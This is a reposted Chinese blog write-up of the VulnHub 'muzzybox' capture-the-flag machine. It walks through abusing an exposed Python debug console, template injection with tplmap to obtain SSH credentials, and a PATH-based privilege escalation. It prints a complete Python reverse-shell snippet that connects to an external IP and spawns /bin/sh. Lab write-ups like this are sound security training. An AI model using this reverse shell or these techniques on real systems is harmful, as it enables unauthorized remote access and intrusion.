码迷,mamicode.com
首页 > 其他好文 > 详细

vulnhub~muzzybox

时间:2020-03-07 20:34:22      阅读:64      评论:0      收藏:0      [点我收藏+]

标签:width   python   border   port   black   idc   手动   个人   roc   

  1. 这个靶机是最新出的,Google了一番,发现walk trough少的可怜,最初是自己弄弄,但自己的确是菜。
    1. challenge 1.就是修改idcard.png 的内容,position principal; Access Level authorized;
    2. 技术图片
    3. 图书卡的Name可以随便写,没有限制(最初我以为是图片木马),会得到PIN:123-456-789,这个东西在challenge 2中会有用处。
    4. challenge 2是python的错误页面,包含着console窗口(要仔细查看哟),然后就是正向连接了呗。
      1 import socket,subprocess,os
      2 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
      3 s.connect(("59.188.234.64",14575))
      4 os.dup2(s.fileno(),0)
      5 os.dup2(s.fileno(),1)
      6 os.dup2(s.fileno(),2)
      7 p=subprocess.call(["/bin/sh","-i"]);

      在主机监听(nc 或者msf),成功的拿到了shell.

    5. challenge 3试了一下存在ssti漏洞,关于这个漏洞网上有很多的说明及instance。手动注入有点麻烦,干脆使用tplmap,技术图片

      在ssti目录下拿到了ssh 口令和用户名 

      1. 技术图片
      2. 登录以后干傻事呀,常规操作发现没有sudo -l;痛苦,就查看了环境变量,发现了 /usr/local/sbin尽然有当前用户的read权限,没毛病,可以利用了。技术图片
      3. 在主机监听,得到flag
    6. 总结如下:个人感觉对ctf的套路还不够熟悉,同时对uinx-like不太了解,应该较为深入的了解一下,平时多看技术博客。

vulnhub~muzzybox

标签:width   python   border   port   black   idc   手动   个人   roc   

原文地址:https://www.cnblogs.com/wlpk/p/12436416.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!